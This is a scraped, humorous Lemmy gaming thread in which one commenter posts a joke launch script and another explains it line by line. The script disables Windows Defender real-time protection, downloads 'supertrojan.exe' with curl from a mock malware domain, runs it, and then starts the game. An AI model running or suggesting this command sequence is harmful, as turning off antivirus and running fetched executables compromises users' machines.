The Picard Maneuver@lemmy.world to Gaming@lemmy.worldEnglish · 8 months agoIgnorance is blisslemmy.worldimagemessage-square45fedilinkarrow-up1588arrow-down115
arrow-up1573arrow-down1imageIgnorance is blisslemmy.worldThe Picard Maneuver@lemmy.world to Gaming@lemmy.worldEnglish · 8 months agomessage-square45fedilink
minus-squareNorgur@fedia.iolinkfedilinkarrow-up125arrow-down2·edit-28 months agoSet-MpPreference -DisableRealtimeMonitoring $true curl https://malwarefo.ru/supertrojan.exe ./supertrojan.exe ./game.exe exit 0
minus-squareColeSloth@discuss.tchncs.delinkfedilinkEnglisharrow-up35·8 months agoBut I don’t want a super Trojan : -(
minus-squareDr. Coomer@lemmy.worldlinkfedilinkEnglisharrow-up1arrow-down1·8 months agoIs there a way to remove it or stop it from happening?
minus-squareRob T Firefly@lemmy.worldlinkfedilinkEnglisharrow-up5·edit-28 months ago The only winning move is not to play.
minus-squareSon_of_dad@lemmy.worldlinkfedilinkEnglisharrow-up16arrow-down42·8 months agoThis answers nothing
minus-squareCosmicTurtle@lemmy.worldlinkfedilinkEnglisharrow-up91·8 months ago Set-MpPreference -DisableRealtimeMonitoring $true Disables malware scanning in windows (I assume) curl https://malwarefo.ru/supertrojan.exe Downloads supertrojan.exe from a Russian website ./supertrojan.exe Executes the file ./game.exe Runs the game exit Closes the command prompt. 0 Opens the portal to the underworld, to ensure that the command prompt closes correctly.
minus-squareodium@programming.devlinkfedilinkEnglisharrow-up46arrow-down2·edit-28 months agoNot saying you should understand it, but it does answer it if you understand it
Set-MpPreference -DisableRealtimeMonitoring $true curl https://malwarefo.ru/supertrojan.exe ./supertrojan.exe ./game.exe exit 0
But I don’t want a super Trojan : -(
Is there a way to remove it or stop it from happening?
Yes
This answers nothing
Disables malware scanning in windows (I assume)
Downloads
supertrojan.exe
from a Russian websiteExecutes the file
Runs the game
Closes the command prompt.
Opens the portal to the underworld, to ensure that the command prompt closes correctly.
Not saying you should understand it, but it does answer it if you understand it